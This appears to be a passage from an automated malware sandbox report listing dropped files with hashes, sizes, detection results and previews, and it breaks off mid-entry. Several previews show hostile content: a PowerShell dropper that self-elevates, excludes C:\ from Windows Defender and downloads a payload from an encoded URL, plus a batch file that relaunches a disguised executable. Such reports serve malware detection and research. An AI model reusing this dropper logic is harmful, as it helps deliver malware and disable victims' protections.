SHA1:	5ABC59BD2CD85ABD20E1FB4C8C4099281729A057
SHA-256:	796E3F050BE25F4E921C75038F335CA48D99BD0CBA547EDF5F62C17FFD74DC0D
SHA-512:	400C798D4DE41147CD615D5384E2548BC691C9E8F1249D83B42EEAD9C09C023D228D3F662217AECBC4E5909586F703F40BF52E3F752BE8BEA17CA16B40DF521B
Malicious:	false
Preview:	@...e...............................$.^..............@..........

C:\Users\user\AppData\Local\Temp\0OsCP16wn7

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4122624
Entropy (8bit):	7.9860936541574965
Encrypted:	false
SSDEEP:	98304:1VtCpBXG8uKobY22R0pbuov/BXG8uKobY22R0pbuovJ:2ghSRaCo3ghSRaCoR
MD5:	5DB95C4DE9B6E98C653AC3DEC5DCE83D
SHA1:	C3E1CB98B5450D21C8E9E975148C282AFCF4CCAE
SHA-256:	8AC4F1DCDF7CE5276D4EE9DBDAEAA4232AA8AD0C383BF804472F156AE2A879C7
SHA-512:	42E5504904F0DB4E62D56C03C8E7E302DF0EBA488A966259AA686E7D952DB8A25EB56B5AC72731400CFD2541B6429D82E95E3BB8E87565BDF0CBE2B488C47368
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug..........................................@..........................0?...........@..................................<..<....................................................................................>...............................text............................... ..`.rdata..............................@..@.data....'...`.......L..............@....tls.................d..............@....rsrc................f..............@..@.reloc........... ...h..............@..B.bss................................@....bss..........!......8!.............@...........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2343424
Entropy (8bit):	7.978016442035459
Encrypted:	false
SSDEEP:	49152:pHx/9iRLusgfLziEqFhJ5v96Adh3BeNHdbOTPixC30tP0MQ:DURLyU95JdhGda7wcM
MD5:	3541C1AC26EB5BBB87F01C20FD9F8824
SHA1:	BF5D136C911491F59BDEB3BF37B8F1A155FD3A97
SHA-256:	B7CD929CE4D0FA849EEAB8A216E1333F63C7D3530DA674F163EFAB4DAE3439D1
SHA-512:	BABC17723D2389919ACD96F977821D57BDD737F01A9598209EFAFA72AE0418E914A5D229F196D80CB5BA70CE82B0F340B18AA255BBE4ED77D821A432D5794A93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|...B#................@............................. $.......$...`.......... ......................................<.............#...................$. .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc.... #.......#.................@..@.reloc.. .....$.......#.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2687
Entropy (8bit):	5.8498231062537185
Encrypted:	false
SSDEEP:	48:cDYmPROAA5Ae/LUIslWc9Q1P3ZC5tlh1xmtqlx3t9wq7Ufl71tT0m23dB:dmPEksoWFPJCt0MPQq7Ol71x0r
MD5:	62E668D5993865A150073479BDC42EC5
SHA1:	B2B4E7767C5B0C9218127401C8D8B8723148FFC7
SHA-256:	EA4B7480D291E1E3EC6029BC92C3C732D005AD215518E8C483388B8227F4DD52
SHA-512:	6BA4FE44398B89A82804013151A73F4AA00BE9468D76CF2B40FE7A410C4D646C84AB10F2561FED694EE0B3A24BD50F46A75427097996BE171A83F671196B0CBC
Malicious:	true
Preview:	.# ..............if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {.. Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$PSCommandPath`"" -Verb RunAs.. exit..}....# .. Windows Defender .......Try {.. Add-MpPreference -ExclusionPath 'C:\' -ErrorAction SilentlyContinue..} Catch {.. # ........}....# .......... URL..$encoded_url = "aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4="..$output = "$env:TEMP\downloaded_file.bin"....# ............. URL..Try {.. Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded_url))) -OutFile $output -UseBasicParsing -ErrorAction SilentlyContinue..} Catch {.. # ........}....# ....

C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1856512
Entropy (8bit):	7.947997173099362
Encrypted:	false
SSDEEP:	49152:Gv9/gAPCg/RIplwfHY/ZgQxj5Rm/ZspSewKLj:k7IpSHY/Z9CZr2L
MD5:	78CBDC5E45F97CA8C6E6E72D99BD5BF1
SHA1:	04D0822E1C4D5862F4477D815A3063B8245E74BD
SHA-256:	56E13B09B7D9ABFB9F0C6656DD1E4CA9ED07005F463AE108B8AB2E7540A4DCDF
SHA-512:	FB296A0E07012F72CEA789B6A2F5A6744F0A689EFB69DEFE51676F2806A77B146117672786FAEC10AB15A6DDEEAA640782E5239A1672517FAADD07233E200372
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug..............................I...........@...........................I.....A&....@.................................\@..p....0.......................A...................................................................................... . . .......B..................@....rsrc........0.......R..............@....idata .....@.......V..............@... .@*..P.......X..............@...nywettin....../......Z..............@...pnoojtlk.....pI......,..............@....taggant.0....I.."...2..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1806336
Entropy (8bit):	7.944492891707347
Encrypted:	false
SSDEEP:	49152:lhlvBjgj6YHUv4NTwra7Z21TU2VeZenXW1:pBjxSUgNTwroMrV41
MD5:	807928C7C8D81BF2C9F4AB5BA2F4763B
SHA1:	C48A08C824E5E273297C333C8E5B1E766F2BA8C2
SHA-256:	2A3BBA0C74C6ECAB8AB9E722A3D2C19866D930C7F79A732AD6A0D24378A6836C
SHA-512:	1496151D3615E25E9A8D8CAC8EF62FA18AB0D3B1C6D366B7683A4A7B4B65296ABB31A2675FBEBB23DAC2227FB21BCB1886500C566B617FD0C40D34D74AE0918F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........i...........@..........................0i......Q....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... .@*...$......\|..............@...ykpsajjh......O......~..............@...lvskadyv......h......h..............@....taggant.0....i.."...n..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	971264
Entropy (8bit):	6.704889214663898
Encrypted:	false
SSDEEP:	24576:jqDEvCTbMWu7rQYlBQcBiT6rprG8aJtd:jTvC/MTQYxsWR7aJ
MD5:	EF28C394DDDD56CEBAD7E246ABB81976
SHA1:	2CD690B87BD0C30FB902C8E1C6BAF442BC990CBC
SHA-256:	30FBE2751C7EF6BB10FAE76789B2D980C216BB97764270361A521074E86FA982
SHA-512:	943EF2AD3BE1AC5E3773CFAAD91368F59F01BB4E23C1B6F4148EAA696774A640C3380ED8FC28855F122D52BB420575E1971F1662A7DFF0A4BCAAF8D8719FC95B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...^.Ug..........".........."......w.............@..........................0......v.....@...@.......@.....................d...\|....@...f.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....f...@...h..................@..@.reloc...u.......v...\..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\17Lpqdey00

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1d55doaHKa

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.373660689688185
Encrypted:	false
SSDEEP:	3:Gw+9nTzF+De:n+7R
MD5:	7F3FDDA25D54676E5BD7B10BAE477818
SHA1:	C342F135CE2692CE2881EBFD62758CEC4B60E4C1
SHA-256:	16A7FAE768EA920703A7A2A3FAE4D852134AFF0CFFC2D8FE0C8AAE91DD262C8F
SHA-512:	1DDD2891C02B44C6C879B74D4AB5C33F0C86C33885720A53079BDF9489B4257246D2CF67FE6C90C3A7DB22F97BCF55CA57D1EFFE772F95CCC0DABF1385EA5421
Malicious:	false
Preview:	Dc7bcUnC8TXBOM3NweVgcLfvw

C:\Users\user\AppData\Local\Temp\580b9vjIX7.bat

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	5.476970344958726
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DER5/ed/10E5BLsKOZG1wkn23fCh:CuVEOCDEf/O59Wfc
MD5:	839F2EC7A559EBE4C662D6234CFE8C23
SHA1:	5616A6E8C63FAAD94494D74BF24CDB8F8111F373
SHA-256:	501C196AE9C7AA34E0728AE9509F277D877F373CD1AD9F05C28114BDE8A66260
SHA-512:	2D0FAA7BB96F17D46490D4EE3C871AE53E655456E58FE0E04DC64DF596A0A88167482D3CE4807D036C6F6FCAA70B2B93BF8C3FF8979E0E974AA64A0DE979DA64
Malicious:	false
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\jdownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\580b9vjIX7.bat"

C:\Users\user\AppData\Local\Temp\5hIG8Pgtpl

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7Zo2ALkNrt

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:0RkWLLpTc/zf:0lcz
MD5:	2F25CE7A9B4EBDD84D7D0795E354EBE7
SHA1:	46E74908C4F587382EA3EE74CC1335BE40F7D5F6
SHA-256:	A375367D3BC2EFC0C2DB6FBA438E0CE6C7655BD489960681697FD2B9E92FD297
SHA-512:	7DCFE9CA817EEF98843D4EBFDA5F0959F6BCD7F3648A68451C959189F287930820C2936F31AA43DFFA7B6F21F9F253DC7221BF2AA08B1696DC38A7B7853014D5
Malicious:	false
Preview:	ml4dSgFxjktsnnL6yhAbkncAz

C:\Users\user\AppData\Local\Temp\A4C5Sx8snd

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BWREQ8A1JW

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DATABASE

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2458112
Entropy (8bit):	7.851763730635174
Encrypted:	false
SSDEEP:	49152:edid1OC3VfbbTfLYiuqB6pPADaAmGbBeNjybO9KIAg30aQNmcq:e0+gVfDREPkmGKyaAGsm
MD5:	FFABCC262FB699998B6191D7656C8805
SHA1:	FD3EA79A8550B14E9CC75FB831FD7A141964A714
SHA-256:	F46E4A7DE978BACEEC5F64CBC9FA1F1E772E864FA3310045CD19D77264698CDE
SHA-512:	79B2E21A9111B16B0F67AE5D1CC40A25773B847D3F4CF78711A8DFD8B67C30BEEC332ED65AC008C9DCA62C84DE891EFF20D7C6050BC868BCE77A17FE56DA61BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.Ug.................x%...........%.. ....%...@.. ........................%...........`.................................@.%.K.....%.......................%...................................................... ............... ..H............text....v%.. ...x%................. ..`.rsrc.........%......z%.............@..@.reloc........%.......%.............@..B................p.%.....H............A..........T....x..............................................(......(......0.......... ........8........E............\...8.........r...p(....o.... ....8........E........4...q...........A...K...i.......8............io...... ....~....{....:....& ....8....... ....8......o...... ....~....{....:y...& ....8n...8.... ....~....{....:U...& ....8J.... ........87....(...... ....~....{....:....& ....8........E........8.....q...& ....~....{....:....& ....8........E.....

C:\Users\user\AppData\Local\Temp\LOT9n4fumI

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LppktJUYzl

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TIjZcfzZ3m

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tdu7cfqANK

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UICDRMc7P4

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZGzDaWrrUH

Download File

Process:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2lwtt4wy.ei1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5s5khc5h.xr5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewynlorb.fli.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
